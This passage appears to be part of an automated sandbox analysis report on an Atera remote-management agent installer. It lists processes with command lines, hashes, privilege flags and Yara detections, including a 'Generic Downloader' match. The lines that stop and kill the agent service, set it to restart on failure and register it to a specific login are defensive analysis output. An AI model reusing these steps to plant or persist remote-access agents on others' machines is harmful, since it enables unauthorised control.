                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:03
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 987DB95BE1D08D72E3D28015C548C789 E Global\MSI0000
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x4e0000
                                                                                                                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:03
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:"NET" STOP AteraAgent
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x1e0000
                                                                                                                                                                                                                                                                                                                                  File size:47'104 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:03
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:04
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\net1 STOP AteraAgent
                                                                                                                                                                                                                                                                                                                                  Imagebase:0xb30000
                                                                                                                                                                                                                                                                                                                                  File size:139'776 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:04
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:"TaskKill.exe" /f /im AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x670000
                                                                                                                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:04
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:05
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="000111.financeiro@yamahaconcessionaria.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000LlkxmIAB" /AgentId="bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2"
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x1c5cb450000
                                                                                                                                                                                                                                                                                                                                  File size:145'968 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1790492966.000001C5E5980000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1793012052.000001C5E5B60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1789701258.000001C5CD182000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1794278518.00007FFD9B694000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1789701258.000001C5CD205000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1789419276.000001C5CB820000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1789701258.000001C5CD202000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000000.1754536857.000001C5CB452000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1788731094.000001C5CB54C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1789701258.000001C5CD236000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1789701258.000001C5CD24C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1788731094.000001C5CB520000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1788731094.000001C5CB526000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1789701258.000001C5CD0D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1789701258.000001C5CD159000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1788731094.000001C5CB5B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1789701258.000001C5CD15C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1788731094.000001C5CB562000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1793099468.000001C5E5CB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                                                                                                  • Detection: 21%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:08
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x20aa0540000
                                                                                                                                                                                                                                                                                                                                  File size:145'968 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2266876260.0000020AA05F0000.00000004.00000020.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA15CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2267142526.0000020AA07E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA1592000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA1283000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2268866315.0000020AA09F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA15CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2284530443.0000020ABA03C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2267142526.0000020AA07DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2263664624.000000CBDA8F5000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA10D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2282825260.0000020AB9C1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA0FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2279102001.0000020AB9720000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA1044000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2267142526.0000020AA078E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA12FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2267142526.0000020AA0804000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2267142526.0000020AA0750000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2267142526.0000020AA082C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:08
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c5700000
                                                                                                                                                                                                                                                                                                                                  File size:72'192 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:08
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:09
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:rundll32.exe "C:\Windows\Installer\MSIF4AD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4519093 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x40000
                                                                                                                                                                                                                                                                                                                                  File size:61'440 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1843416546.0000000004694000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1843416546.00000000045F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:22
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "dda45391-8ca1-4116-81d7-6a5f04c3dc70" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000LlkxmIAB
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x1be62230000
                                                                                                                                                                                                                                                                                                                                  File size:177'712 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:31DEF444E6135301EA3C38A985341837
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1955362018.000001BE62C53000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1954314035.000001BE62321000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1954927501.000001BE62670000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1954314035.000001BE622E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1954998107.000001BE62A42000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000000.1924528514.000001BE62232000.00000002.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1955362018.000001BE62C63000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1954314035.000001BE6236E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1955362018.000001BE62BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:22
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
